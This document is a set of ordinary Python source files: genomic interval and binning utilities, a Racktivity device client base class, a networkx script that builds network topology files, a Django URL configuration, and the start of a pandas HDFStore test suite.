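    # rows overlapping chr1:12-22 -> the (10, 20) and (20, 30) intervals
    return bedslice(bed, ('chr1', 12, 22))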
def bedslice_series(beds, region):
"""
Slice a series multi-indexed by ['chrom', 'start', 'end'].
Assumes no proper nesting of intervals.
"""
chrom, start, end = region
return beds.loc[chrom].loc[start:end]
def bg2slice(bg2, region1, region2):
"""
Slice a dataframe with columns ['chrom1', 'start1', 'end1', 'chrom2',
'start2', 'end2']. Assumes no proper nesting of intervals.
"""
chrom1, start1, end1 = region1
chrom2, start2, end2 = region2
if end1 is None:
end1 = np.inf
if end2 is None:
end2 = np.inf
out = bg2[(bg2['chrom1'] == chrom1) &
(bg2['start1'] >= start1) &
(bg2['end1'] < end1) &
(bg2['chrom2'] == chrom2) &
(bg2['start2'] >= start2) &
(bg2['end2'] < end2)]
return out
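# Tiny bg2slice() sketch: keep rows whose two anchors fall within the given
# regions (note that the end coordinates are filtered with a strict '<').
def _bg2slice_example():
    bg2 = pd.DataFrame({
        'chrom1': ['chr1', 'chr1'], 'start1': [0, 50], 'end1': [10, 60],
        'chrom2': ['chr2', 'chr2'], 'start2': [0, 50], 'end2': [10, 60],
    })
    return bg2slice(bg2, ('chr1', 0, 20), ('chr2', 0, 20))  # -> first row only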
def expand_regions(df, pad_bp, chromsizes, side='both', inplace=False):
if not inplace:
df = df.copy()
if side == 'both' or side == 'left':
df.start = np.maximum(0, df.start.values - pad_bp)
if side == 'both' or side == 'right':
df.end = np.minimum(df.chrom.apply(chromsizes.__getitem__),
df.end+pad_bp)
return df
def bychrom(func, *tables, **kwargs):
"""
Split one or more bed-like dataframes by chromosome.
Apply ``func(chrom, *slices)`` to each chromosome slice.
Yield results.
Parameters
----------
func : function to apply to split dataframes.
The expected signature is ``func(chrom, df1[, df2[, ...])``,
where ``df1, df2, ...`` are subsets of the input dataframes.
The function can return anything.
tables : sequence of BED-like ``pd.DataFrame``s.
The first column of each dataframe must be chromosome labels,
unless specified by ``chrom_field``.
chroms : sequence of str, optional
Select which chromosome subsets of the data to apply the function to.
Defaults to all unique chromosome labels in the first dataframe input,
in natural sorted order.
chrom_field: str, optional
Name of column containing chromosome labels.
ret_chrom : bool, optional (default: False)
Yield "chromosome, value" pairs as output instead of only values.
map : callable, optional (default: ``itertools.imap`` or ``map`` in Python 3)
Map implementation to use.
Returns
-------
Iterator or future that yields the output of running `func` on
each chromosome
"""
chroms = kwargs.pop('chroms', None)
parallel = kwargs.pop('parallel', False)
ret_chrom = kwargs.pop('ret_chrom', False)
map_impl = kwargs.pop('map', six.moves.map)
first = tables[0]
chrom_field = kwargs.pop('chrom_field', first.columns[0])
if chroms is None:
chroms = natsorted(first[chrom_field].unique())
grouped_tables = [table.groupby(chrom_field) for table in tables]
def iter_partials():
for chrom in chroms:
partials = []
for gby in grouped_tables:
try:
partials.append(gby.get_group(chrom))
except KeyError:
partials.append(gby.head()[0:0])
yield partials
if ret_chrom:
def run_job(chrom, partials):
return chrom, func(chrom, *partials)
else:
def run_job(chrom, partials):
return func(chrom, *partials)
return map_impl(run_job, chroms, iter_partials())
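# Illustrative bychrom() call: count rows per chromosome in a toy frame.  The
# callback receives the chromosome label followed by one slice per input table.
def _bychrom_example():
    bed = pd.DataFrame({'chrom': ['chr2', 'chr1', 'chr1'],
                        'start': [0, 0, 50],
                        'end': [10, 10, 60]})
    counts = dict(bychrom(lambda chrom, df: len(df), bed, ret_chrom=True))
    return counts  # {'chr1': 2, 'chr2': 1}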
def chromsorted(df, by=None, ignore_index=True, chromosomes=None, **kwargs):
"""
Sort bed-like dataframe by chromosome label in "natural" alphanumeric
order, followed by any columns specified in ``by``.
"""
chrom_col = df['chrom']
is_categorical = pd.api.types.is_categorical(chrom_col)
if chromosomes is None:
if not (is_categorical and chrom_col.cat.ordered):
dtype = pd.CategoricalDtype(
natsorted(chrom_col.unique()), ordered=True
)
chrom_col = chrom_col.astype(dtype)
else:
dtype = pd.CategoricalDtype(chromosomes, ordered=True)
chrom_col = chrom_col.astype(dtype)
missing = df['chrom'].loc[chrom_col.isnull()].unique().tolist()
if len(missing):
raise ValueError("Unknown ordering for {}.".format(missing))
sort_cols = ['chrom']
if by is not None:
if not isinstance(by, list):
by = [by]
        sort_cols.extend(by)
out = (
df
.assign(chrom=chrom_col)
.sort_values(sort_cols, **kwargs)
.reset_index(drop=True)
)
if not is_categorical:
out['chrom'] = out['chrom'].astype(str)
return out
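# chromsorted() sketch: rows are ordered 'chr2' before 'chr10', and within a
# chromosome by the extra 'start' column passed via ``by``.
def _chromsorted_example():
    df = pd.DataFrame({'chrom': ['chr10', 'chr2', 'chr2'],
                       'start': [5, 30, 10]})
    return chromsorted(df, by='start')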
def make_chromarms(chromsizes, mids, binsize=None, suffixes=('p', 'q')):
"""
Split chromosomes into chromosome arms
Parameters
----------
chromsizes : pandas.Series
Series mapping chromosomes to lengths in bp.
mids : dict-like
Mapping of chromosomes to midpoint locations.
binsize : int, optional
Round midpoints to nearest bin edge for compatibility with a given
bin grid.
suffixes : tuple, optional
Suffixes to name chromosome arms. Defaults to p and q.
Returns
-------
4-column BED-like DataFrame (chrom, start, end, name).
Arm names are chromosome names + suffix.
Any chromosome not included in ``mids`` will be omitted.
"""
chromosomes = [chrom for chrom in chromsizes.index if chrom in mids]
p_arms = [
[chrom, 0, mids[chrom], chrom + suffixes[0]]
for chrom in chromosomes
]
if binsize is not None:
for x in p_arms:
x[2] = int(round(x[2] / binsize)) * binsize
q_arms = [
[chrom, mids[chrom], chromsizes[chrom], chrom + suffixes[1]]
for chrom in chromosomes
]
if binsize is not None:
for x in q_arms:
x[1] = int(round(x[1] / binsize)) * binsize
interleaved = [*sum(zip(p_arms, q_arms), ())]
return pd.DataFrame(
interleaved,
columns=['chrom', 'start', 'end', 'name']
)
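# make_chromarms() sketch: split two chromosomes at the given midpoints,
# snapping each split to a 10 bp bin grid via ``binsize``.
def _chromarms_example():
    chromsizes = pd.Series({'chr1': 100, 'chr2': 80})
    mids = {'chr1': 47, 'chr2': 33}
    return make_chromarms(chromsizes, mids, binsize=10)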
def binnify(chromsizes, binsize, rel_ids=False):
"""
Divide a genome into evenly sized bins.
Parameters
----------
chromsizes : Series
pandas Series indexed by chromosome name with chromosome lengths in bp.
binsize : int
size of bins in bp
Returns
-------
Data frame with columns: 'chrom', 'start', 'end'.
"""
def _each(chrom):
clen = chromsizes[chrom]
n_bins = int(np.ceil(clen / binsize))
binedges = np.arange(0, (n_bins+1)) * binsize
binedges[-1] = clen
return pd.DataFrame({
'chrom': [chrom]*n_bins,
'start': binedges[:-1],
'end': binedges[1:],
}, columns=['chrom', 'start', 'end'])
bintable = pd.concat(map(_each, chromsizes.keys()),
axis=0, ignore_index=True)
if rel_ids:
bintable['rel_id'] = bintable.groupby('chrom').cumcount()
# if as_cat:
# bintable['chrom'] = pd.Categorical(
# bintable['chrom'],
# categories=list(chromsizes.keys()),
# ordered=True)
return bintable
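# binnify() sketch: 25 bp bins over a 60 bp chromosome give [0, 25), [25, 50)
# and a final [50, 60) bin clipped to the chromosome end.
def _binnify_example():
    return binnify(pd.Series({'chrI': 60}), 25)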
def digest(fasta_records, enzyme):
"""
Divide a genome into restriction fragments.
Parameters
----------
fasta_records : OrderedDict
Dictionary of chromosome names to sequence records.
enzyme: str
Name of restriction enzyme.
Returns
-------
Dataframe with columns: 'chrom', 'start', 'end'.
"""
import Bio.Restriction as biorst
import Bio.Seq as bioseq
# http://biopython.org/DIST/docs/cookbook/Restriction.html#mozTocId447698
chroms = fasta_records.keys()
try:
cut_finder = getattr(biorst, enzyme).search
except AttributeError:
raise ValueError('Unknown enzyme name: {}'.format(enzyme))
def _each(chrom):
seq = bioseq.Seq(str(fasta_records[chrom]))
cuts = np.r_[0, np.array(cut_finder(seq)) + 1, len(seq)].astype(int)
n_frags = len(cuts) - 1
frags = pd.DataFrame({
'chrom': [chrom] * n_frags,
'start': cuts[:-1],
'end': cuts[1:]},
columns=['chrom', 'start', 'end'])
return frags
return pd.concat(map(_each, chroms), axis=0, ignore_index=True)
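# digest() sketch (requires Biopython): cut a toy record with EcoRI.  Plain
# strings stand in for FASTA records here, which works because digest() only
# takes str(...) of each record.
def _digest_example():
    from collections import OrderedDict
    fasta_records = OrderedDict([('chrI', 'TTGAATTCCATT')])
    return digest(fasta_records, 'EcoRI')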
def frac_mapped(bintable, fasta_records):
def _each(bin):
s = str(fasta_records[bin.chrom][bin.start:bin.end])
nbases = len(s)
n = s.count('N')
n += s.count('n')
return (nbases - n) / nbases
return bintable.apply(_each, axis=1)
def frac_gc(bintable, fasta_records, mapped_only=True):
def _each(chrom_group):
chrom = chrom_group.name
seq = fasta_records[chrom]
gc = []
for _, bin in chrom_group.iterrows():
s = str(seq[bin.start:bin.end])
g = s.count('G')
g += s.count('g')
c = s.count('C')
c += s.count('c')
nbases = len(s)
if mapped_only:
n = s.count('N')
n += s.count('n')
nbases -= n
gc.append((g + c) / nbases if nbases > 0 else np.nan)
return gc
out = bintable.groupby('chrom', sort=False).apply(_each)
return pd.Series(data=np.concatenate(out), index=bintable.index)
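# frac_gc() sketch: plain strings can also stand in for FASTA records since
# only slicing and str() are used.  First bin: 2 G/C out of 4 bases; second
# bin: 2 G/C out of 2 mapped (non-N) bases.
def _frac_gc_example():
    bins = pd.DataFrame({'chrom': ['chrI', 'chrI'],
                         'start': [0, 4],
                         'end': [4, 8]})
    return frac_gc(bins, {'chrI': 'ACGTNNGG'})  # -> [0.5, 1.0]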
def frac_gene_coverage(bintable, mrna):
from .tools import bedtools
if isinstance(mrna, six.string_types):
from .resources import UCSCClient
mrna=UCSCClient(mrna).fetch_mrna().rename(
columns={'tName': 'chrom', 'tStart': 'start', 'tEnd': 'end'})
mrna = mrna.sort_values(['chrom','start','end']).reset_index(drop=True)
with tsv(bintable) as a, tsv(mrna[['chrom','start','end']]) as b:
cov = bedtools.coverage(a=a.name, b=b.name)
bintable = bintable.copy()
bintable['gene_count'] = cov.iloc[:,-4]
bintable['gene_coverage'] = cov.iloc[:,-1]
return bintable
|
py | b4034e1d1238e32aea60ad40c58e5719062b4210 | from clients.racktivity.energyswitch.common import convert
from Jumpscale import j
JSBASE = j.baseclasses.object
class BaseModule(j.baseclasses.object):
def __init__(self, parent):
JSBASE.__init__(self)
self._parent = parent
self._guidTable = {}
self._pointerGuids = []
def definePointerStructure(self):
"""prepares definition of binary structure
@param guidList - list of tuples (guid, count)
@param guidDef - dictionary of guid -> definition
returns paramInfo structure - list of tuples (guid, definition, count)
"""
paramInfo = []
for (guid, length) in self._pointerGuids:
paramInfo.append((guid, self._guidTable[guid], length))
return paramInfo
def _getPointerData(self, moduleID):
"""private function to get pointer data from device and convert to dict
"""
paramInfo = self.definePointerStructure()
data = self._parent.client.getPointer(moduleID)
array = convert.pointer2values(data, paramInfo)
result = dict()
for idx, info in enumerate(paramInfo):
result[info[0]] = array[idx]
return result
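# Hypothetical subclass sketch (illustrative only: the guids, counts and the
# ">B"/">H" definition values are made up).  A concrete module would presumably
# fill _guidTable and _pointerGuids; definePointerStructure() then simply pairs
# them up and needs no device I/O.
class _ExampleModule(BaseModule):
    def __init__(self, parent):
        BaseModule.__init__(self, parent)
        self._guidTable = {10001: ">B", 10002: ">H"}
        self._pointerGuids = [(10001, 1), (10002, 8)]
# _ExampleModule(parent).definePointerStructure()
# -> [(10001, ">B", 1), (10002, ">H", 8)]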
|
py | b4034f39e400e62fd76a1306e19cf674eae9ca9d | #!/usr/bin/env python
"""
You must have networkx and matplotlib installed for this program to work.
"""
# Author: Rishi Thakkar ([email protected])
try:
import matplotlib.pyplot as plt
plot_lib=True
except:
plot_lib=False
import networkx as nx
import random
import sys
import os
import shutil
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
##### Get user inputs #####
print("Welcome to the Graph Generator!\n")
print(bcolors.HEADER + bcolors.BOLD + bcolors.UNDERLINE + "Graph Type to Use:" + bcolors.ENDC)
modeDescription = bcolors.WARNING + "Mode 0 - " + bcolors.ENDC + bcolors.OKGREEN + "Random Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 1 - " + bcolors.ENDC + bcolors.OKGREEN + "Complete Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 2 - " + bcolors.ENDC + bcolors.OKGREEN + "Barbell Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 3 - " + bcolors.ENDC + bcolors.OKGREEN + "2D Grid Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 4 - " + bcolors.ENDC + bcolors.OKGREEN + "Dorogovtsev Goltsev Mmendes Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 5 - " + bcolors.ENDC + bcolors.OKGREEN + "Cycle Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 6 - " + bcolors.ENDC + bcolors.OKGREEN + "Circular Ladder Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 7 - " + bcolors.ENDC + bcolors.OKGREEN + "Lollipop Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 8 - " + bcolors.ENDC + bcolors.OKGREEN + "Wheel Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 9 - " + bcolors.ENDC + bcolors.OKGREEN + "Star Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 10 - " + bcolors.ENDC + bcolors.OKGREEN + "Path Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 11 - " + bcolors.ENDC + bcolors.OKGREEN + "Moebius Kantor Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 12 - " + bcolors.ENDC + bcolors.OKGREEN + "Tutte Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 13 - " + bcolors.ENDC + bcolors.OKGREEN + "Truncated Tetrahedron Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 14 - " + bcolors.ENDC + bcolors.OKGREEN + "Truncated Cube Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 15 - " + bcolors.ENDC + bcolors.OKGREEN + "Sedgewick Maze Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 16 - " + bcolors.ENDC + bcolors.OKGREEN + "Pappus Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 17 - " + bcolors.ENDC + bcolors.OKGREEN + "Bull Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 18 - " + bcolors.ENDC + bcolors.OKGREEN + "Krackhardt Kite Graph" + bcolors.ENDC + "\n"
print(modeDescription)
##### Generate Graph #####
while(1):
mode = int(input("Please enter mode of graph type for generation: "))
if mode == 0:
nodes = int(input("Number of nodes: "))
edgeP = float(input("Probability of edge formation: "))
G=nx.fast_gnp_random_graph(nodes, edgeP)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 1:
nodes = int(input("Number of nodes: "))
G=nx.complete_graph(nodes)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 2:
nodesL = int(input("Number of outer nodes (>= 1): "))
nodesR = int(input("Number of nodes for connections: "))
G=nx.barbell_graph(nodesL, nodesR)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 3:
rows = int(input("Number of rows: "))
cols = int(input("Number of cols: "))
G=nx.grid_2d_graph(rows, cols)
pos=nx.spectral_layout(G)
break
elif mode == 4:
nodes = int(input("Number of generations (<= 5): "))
if nodes > 5:
print("Invalid input! Please execute script again.")
            sys.exit()
G=nx.dorogovtsev_goltsev_mendes_graph(nodes)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 5:
nodes = int(input("Number of nodes: "))
G=nx.cycle_graph(nodes)
pos=nx.circular_layout(G)
break
elif mode == 6:
nodes = int(input("Number of nodes: "))
G=nx.circular_ladder_graph(nodes)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 7:
nodesK = int(input("Number of nodes in candy: "))
nodesP = int(input("Number of nodes in stick: "))
G=nx.lollipop_graph(nodesK, nodesP)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 8:
nodes = int(input("Number of nodes: "))
G=nx.wheel_graph(nodes)
pos=nx.spectral_layout(G)
break
elif mode == 9:
nodes = int(input("Number of nodes: "))
G=nx.star_graph(nodes)
pos=nx.spring_layout(G,k=1,iterations=100)
break
elif mode == 10:
nodes = int(input("Number of nodes: "))
G=nx.path_graph(nodes)
pos=nx.circular_layout(G)
break
elif mode == 11:
G=nx.moebius_kantor_graph()
pos=nx.spectral_layout(G)
break
elif mode == 12:
G=nx.tutte_graph()
pos=nx.spectral_layout(G)
break
elif mode == 13:
G=nx.truncated_tetrahedron_graph()
pos=nx.spectral_layout(G)
break
elif mode == 14:
G=nx.truncated_cube_graph()
pos=nx.spectral_layout(G)
break
elif mode == 15:
G=nx.sedgewick_maze_graph()
pos=nx.spectral_layout(G)
break
elif mode == 16:
G=nx.pappus_graph()
pos=nx.spectral_layout(G)
break
elif mode == 17:
G=nx.bull_graph()
pos=nx.spectral_layout(G)
break
elif mode == 18:
G=nx.krackhardt_kite_graph()
break
else:
print("Please enter a valid number.")
costsChecker = int(input("Cost Mode (0 - random / 1 - cost of 1): "))
# assigns random weights to all of the edges
for (u, v) in G.edges():
    if costsChecker == 0:
        G[u][v]['weight'] = random.randint(0, 500)
    else:
        G[u][v]['weight'] = 1
##### Setup Enviornment ####
if os.path.isdir("./topology"):
shutil.rmtree("./topology")
os.mkdir("./topology")
##### Output Files #####
# Write initial costs to file and create gold topology, grid graph is special case
edgeChecker = {}
edgeList = open("./topology/networkTopology.txt", 'w')
goldFile = open("./topology/goldNetwork.txt", 'w')
if mode != 3:
for v in G:
initCostFile = open("./topology/nodecosts" + str(v), 'w')
goldFile.write("Node: " + str(v) + "\n")
for n in G.neighbors(v):
initCostFile.write(str(n) + " " + str(G[v][n]['weight']) + "\n")
goldFile.write(" -> " + str(n) + ", cost = " + str(G[v][n]['weight']) + "\n")
            if v*256 + n not in edgeChecker.keys() and n*256 + v not in edgeChecker.keys():
edgeList.write(str(v) + " " + str(n) + "\n")
edgeChecker[v*256 + n] = True
edgeChecker[n*256 + v] = True
else:
for v in G:
initCostFile = open("./topology/nodecosts" + str(v[0]*cols + v[1]), 'w')
goldFile.write("Node: " + str(v[0]*cols + v[1]) + "\n")
for n in G.neighbors(v):
initCostFile.write(str(n[0]*cols + n[1]) + " " + str(G[v][n]['weight']) + "\n")
goldFile.write(" -> " + str(n[0]*cols + n[1]) + ", cost = " + str(G[v][n]['weight']) + "\n")
if ((v[0]*cols + v[1])*256 + n[0]*cols + n[1]) not in edgeChecker.keys() and ((n[0]*cols + n[1])*256 + v[0]*cols + v[1]) not in edgeChecker.keys():
edgeList.write(str(v[0]*cols + v[1]) + " " + str(n[0]*cols + n[1]) + "\n")
                edgeChecker[(v[0]*cols + v[1])*256 + n[0]*cols + n[1]] = True
                edgeChecker[(n[0]*cols + n[1])*256 + v[0]*cols + v[1]] = True
if plot_lib == True:
plt.figure(1,figsize=(20,20))
try:
pos
except NameError:
plt.axis('off')
        nx.draw_networkx(G, node_color='#A0CBE2', width=.5, with_labels=True)
else:
nx.draw(G,pos,node_color='#A0CBE2',width=.5,with_labels=True)
plt.savefig("./topology/networkTopology.png") # save as png
|
py | b4035037d4657ef3fa986a433de8a3332299eea4 | from django.conf.urls import patterns, url
contact_urls = patterns('',
url(r'^$', 'crmapp.contacts.views.contact_detail', name="contact_detail"),
url(r'^edit/$',
'crmapp.contacts.views.contact_cru', name='contact_update'
),
)
|
py | b40350ada546c8314874aa580af7d775c4c0803a | import pytest
import os
import tempfile
from contextlib import contextmanager
from warnings import catch_warnings
from distutils.version import LooseVersion
import datetime
from datetime import timedelta
import numpy as np
import pandas as pd
from pandas import (Series, DataFrame, Panel, Panel4D, MultiIndex, Int64Index,
RangeIndex, Categorical, bdate_range,
date_range, timedelta_range, Index, DatetimeIndex,
isna, compat, concat, Timestamp)
import pandas.util.testing as tm
import pandas.util._test_decorators as td
from pandas.util.testing import (assert_panel4d_equal,
assert_panel_equal,
assert_frame_equal,
assert_series_equal,
set_timezone)
from pandas.compat import (is_platform_windows, is_platform_little_endian,
PY35, PY36, BytesIO, text_type,
range, lrange, u)
from pandas.io.formats.printing import pprint_thing
from pandas.core.dtypes.common import is_categorical_dtype
tables = pytest.importorskip('tables')
from pandas.io import pytables as pytables # noqa:E402
from pandas.io.pytables import (TableIterator, # noqa:E402
HDFStore, get_store, Term, read_hdf,
PossibleDataLossError, ClosedFileError)
_default_compressor = ('blosc' if LooseVersion(tables.__version__) >=
LooseVersion('2.2') else 'zlib')
# contextmanager to ensure the file cleanup
def safe_remove(path):
if path is not None:
try:
os.remove(path)
except:
pass
def safe_close(store):
try:
if store is not None:
store.close()
except:
pass
def create_tempfile(path):
""" create an unopened named temporary file """
return os.path.join(tempfile.gettempdir(), path)
@contextmanager
def ensure_clean_store(path, mode='a', complevel=None, complib=None,
fletcher32=False):
try:
# put in the temporary path if we don't have one already
if not len(os.path.dirname(path)):
path = create_tempfile(path)
store = HDFStore(path, mode=mode, complevel=complevel,
                         complib=complib, fletcher32=fletcher32)
yield store
finally:
safe_close(store)
if mode == 'w' or mode == 'a':
safe_remove(path)
@contextmanager
def ensure_clean_path(path):
"""
return essentially a named temporary file that is not opened
    and deleted on exiting; if path is a list, then create and
return list of filenames
"""
try:
if isinstance(path, list):
filenames = [create_tempfile(p) for p in path]
yield filenames
else:
filenames = [create_tempfile(path)]
yield filenames[0]
finally:
for f in filenames:
safe_remove(f)
# set these parameters so we don't have file sharing
tables.parameters.MAX_NUMEXPR_THREADS = 1
tables.parameters.MAX_BLOSC_THREADS = 1
tables.parameters.MAX_THREADS = 1
def _maybe_remove(store, key):
"""For tests using tables, try removing the table to be sure there is
no content from previous tests using the same table name."""
try:
store.remove(key)
except:
pass
class Base(object):
@classmethod
def setup_class(cls):
# Pytables 3.0.0 deprecates lots of things
tm.reset_testing_mode()
@classmethod
def teardown_class(cls):
# Pytables 3.0.0 deprecates lots of things
tm.set_testing_mode()
def setup_method(self, method):
self.path = 'tmp.__%s__.h5' % tm.rands(10)
def teardown_method(self, method):
pass
@pytest.mark.single
class TestHDFStore(Base):
def test_factory_fun(self):
path = create_tempfile(self.path)
try:
with catch_warnings(record=True):
with get_store(path) as tbl:
raise ValueError('blah')
except ValueError:
pass
finally:
safe_remove(path)
try:
with catch_warnings(record=True):
with get_store(path) as tbl:
tbl['a'] = tm.makeDataFrame()
with catch_warnings(record=True):
with get_store(path) as tbl:
assert len(tbl) == 1
assert type(tbl['a']) == DataFrame
finally:
safe_remove(self.path)
def test_context(self):
path = create_tempfile(self.path)
try:
with HDFStore(path) as tbl:
raise ValueError('blah')
except ValueError:
pass
finally:
safe_remove(path)
try:
with HDFStore(path) as tbl:
tbl['a'] = tm.makeDataFrame()
with HDFStore(path) as tbl:
assert len(tbl) == 1
assert type(tbl['a']) == DataFrame
finally:
safe_remove(path)
def test_conv_read_write(self):
path = create_tempfile(self.path)
try:
def roundtrip(key, obj, **kwargs):
obj.to_hdf(path, key, **kwargs)
return read_hdf(path, key)
o = tm.makeTimeSeries()
assert_series_equal(o, roundtrip('series', o))
o = tm.makeStringSeries()
assert_series_equal(o, roundtrip('string_series', o))
o = tm.makeDataFrame()
assert_frame_equal(o, roundtrip('frame', o))
with catch_warnings(record=True):
o = tm.makePanel()
assert_panel_equal(o, roundtrip('panel', o))
# table
df = DataFrame(dict(A=lrange(5), B=lrange(5)))
df.to_hdf(path, 'table', append=True)
result = read_hdf(path, 'table', where=['index>2'])
assert_frame_equal(df[df.index > 2], result)
finally:
safe_remove(path)
def test_long_strings(self):
# GH6166
# unconversion of long strings was being chopped in earlier
# versions of numpy < 1.7.2
df = DataFrame({'a': tm.rands_array(100, size=10)},
index=tm.rands_array(100, size=10))
with ensure_clean_store(self.path) as store:
store.append('df', df, data_columns=['a'])
result = store.select('df')
assert_frame_equal(df, result)
def test_api(self):
# GH4584
        # API issue when to_hdf doesn't accept append AND format args
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
df.iloc[:10].to_hdf(path, 'df', append=True, format='table')
df.iloc[10:].to_hdf(path, 'df', append=True, format='table')
assert_frame_equal(read_hdf(path, 'df'), df)
# append to False
df.iloc[:10].to_hdf(path, 'df', append=False, format='table')
df.iloc[10:].to_hdf(path, 'df', append=True, format='table')
assert_frame_equal(read_hdf(path, 'df'), df)
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
df.iloc[:10].to_hdf(path, 'df', append=True)
df.iloc[10:].to_hdf(path, 'df', append=True, format='table')
assert_frame_equal(read_hdf(path, 'df'), df)
# append to False
df.iloc[:10].to_hdf(path, 'df', append=False, format='table')
df.iloc[10:].to_hdf(path, 'df', append=True)
assert_frame_equal(read_hdf(path, 'df'), df)
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
df.to_hdf(path, 'df', append=False, format='fixed')
assert_frame_equal(read_hdf(path, 'df'), df)
df.to_hdf(path, 'df', append=False, format='f')
assert_frame_equal(read_hdf(path, 'df'), df)
df.to_hdf(path, 'df', append=False)
assert_frame_equal(read_hdf(path, 'df'), df)
df.to_hdf(path, 'df')
assert_frame_equal(read_hdf(path, 'df'), df)
with ensure_clean_store(self.path) as store:
path = store._path
df = tm.makeDataFrame()
_maybe_remove(store, 'df')
store.append('df', df.iloc[:10], append=True, format='table')
store.append('df', df.iloc[10:], append=True, format='table')
assert_frame_equal(store.select('df'), df)
# append to False
_maybe_remove(store, 'df')
store.append('df', df.iloc[:10], append=False, format='table')
store.append('df', df.iloc[10:], append=True, format='table')
assert_frame_equal(store.select('df'), df)
# formats
_maybe_remove(store, 'df')
store.append('df', df.iloc[:10], append=False, format='table')
store.append('df', df.iloc[10:], append=True, format='table')
assert_frame_equal(store.select('df'), df)
_maybe_remove(store, 'df')
store.append('df', df.iloc[:10], append=False, format='table')
store.append('df', df.iloc[10:], append=True, format=None)
assert_frame_equal(store.select('df'), df)
with ensure_clean_path(self.path) as path:
# invalid
df = tm.makeDataFrame()
pytest.raises(ValueError, df.to_hdf, path,
'df', append=True, format='f')
pytest.raises(ValueError, df.to_hdf, path,
'df', append=True, format='fixed')
pytest.raises(TypeError, df.to_hdf, path,
'df', append=True, format='foo')
pytest.raises(TypeError, df.to_hdf, path,
'df', append=False, format='bar')
# File path doesn't exist
path = ""
pytest.raises(compat.FileNotFoundError,
read_hdf, path, 'df')
def test_api_default_format(self):
# default_format option
with ensure_clean_store(self.path) as store:
df = tm.makeDataFrame()
pd.set_option('io.hdf.default_format', 'fixed')
_maybe_remove(store, 'df')
store.put('df', df)
assert not store.get_storer('df').is_table
pytest.raises(ValueError, store.append, 'df2', df)
pd.set_option('io.hdf.default_format', 'table')
_maybe_remove(store, 'df')
store.put('df', df)
assert store.get_storer('df').is_table
_maybe_remove(store, 'df2')
store.append('df2', df)
assert store.get_storer('df').is_table
pd.set_option('io.hdf.default_format', None)
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
pd.set_option('io.hdf.default_format', 'fixed')
df.to_hdf(path, 'df')
with HDFStore(path) as store:
assert not store.get_storer('df').is_table
pytest.raises(ValueError, df.to_hdf, path, 'df2', append=True)
pd.set_option('io.hdf.default_format', 'table')
df.to_hdf(path, 'df3')
with HDFStore(path) as store:
assert store.get_storer('df3').is_table
df.to_hdf(path, 'df4', append=True)
with HDFStore(path) as store:
assert store.get_storer('df4').is_table
pd.set_option('io.hdf.default_format', None)
def test_keys(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeSeries()
store['b'] = tm.makeStringSeries()
store['c'] = tm.makeDataFrame()
with catch_warnings(record=True):
store['d'] = tm.makePanel()
store['foo/bar'] = tm.makePanel()
assert len(store) == 5
expected = set(['/a', '/b', '/c', '/d', '/foo/bar'])
assert set(store.keys()) == expected
assert set(store) == expected
def test_iter_empty(self):
with ensure_clean_store(self.path) as store:
# GH 12221
assert list(store) == []
def test_repr(self):
with ensure_clean_store(self.path) as store:
repr(store)
store.info()
store['a'] = tm.makeTimeSeries()
store['b'] = tm.makeStringSeries()
store['c'] = tm.makeDataFrame()
with catch_warnings(record=True):
store['d'] = tm.makePanel()
store['foo/bar'] = tm.makePanel()
store.append('e', tm.makePanel())
df = tm.makeDataFrame()
df['obj1'] = 'foo'
df['obj2'] = 'bar'
df['bool1'] = df['A'] > 0
df['bool2'] = df['B'] > 0
df['bool3'] = True
df['int1'] = 1
df['int2'] = 2
df['timestamp1'] = Timestamp('20010102')
df['timestamp2'] = Timestamp('20010103')
df['datetime1'] = datetime.datetime(2001, 1, 2, 0, 0)
df['datetime2'] = datetime.datetime(2001, 1, 3, 0, 0)
df.loc[3:6, ['obj1']] = np.nan
df = df._consolidate()._convert(datetime=True)
# PerformanceWarning
with catch_warnings(record=True):
store['df'] = df
# make a random group in hdf space
store._handle.create_group(store._handle.root, 'bah')
assert store.filename in repr(store)
assert store.filename in str(store)
store.info()
# storers
with ensure_clean_store(self.path) as store:
df = tm.makeDataFrame()
store.append('df', df)
s = store.get_storer('df')
repr(s)
str(s)
def test_contains(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeSeries()
store['b'] = tm.makeDataFrame()
store['foo/bar'] = tm.makeDataFrame()
assert 'a' in store
assert 'b' in store
assert 'c' not in store
assert 'foo/bar' in store
assert '/foo/bar' in store
